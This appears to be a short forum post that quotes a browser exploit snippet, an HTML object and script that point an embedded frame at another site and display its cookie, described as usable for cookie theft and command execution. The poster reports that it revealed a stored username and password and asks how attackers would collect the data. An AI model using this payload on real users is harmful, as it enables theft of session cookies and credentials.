Ok here is the code that does it:
You can also use this exploit for Elevating privileges, arbitrary command execution, local file reading,stealing arbitrary cookies, etc.Code:<object id="data" data="empty.html" type="text/html"></object> <script> var ref=document.getElementById("data").object; ref.location.href = "http://www.antionline.com"; setTimeout("alert(ref.cookie)",5000); </script>
I tried the code to read a different cookie beside AO and it showed me my username and encrypted password. Ok scary, but my real question is what good is this if it shows on my screen. How do the webmasters or email authors get the information if it is shown on the persons computer who reads the mail or views the page?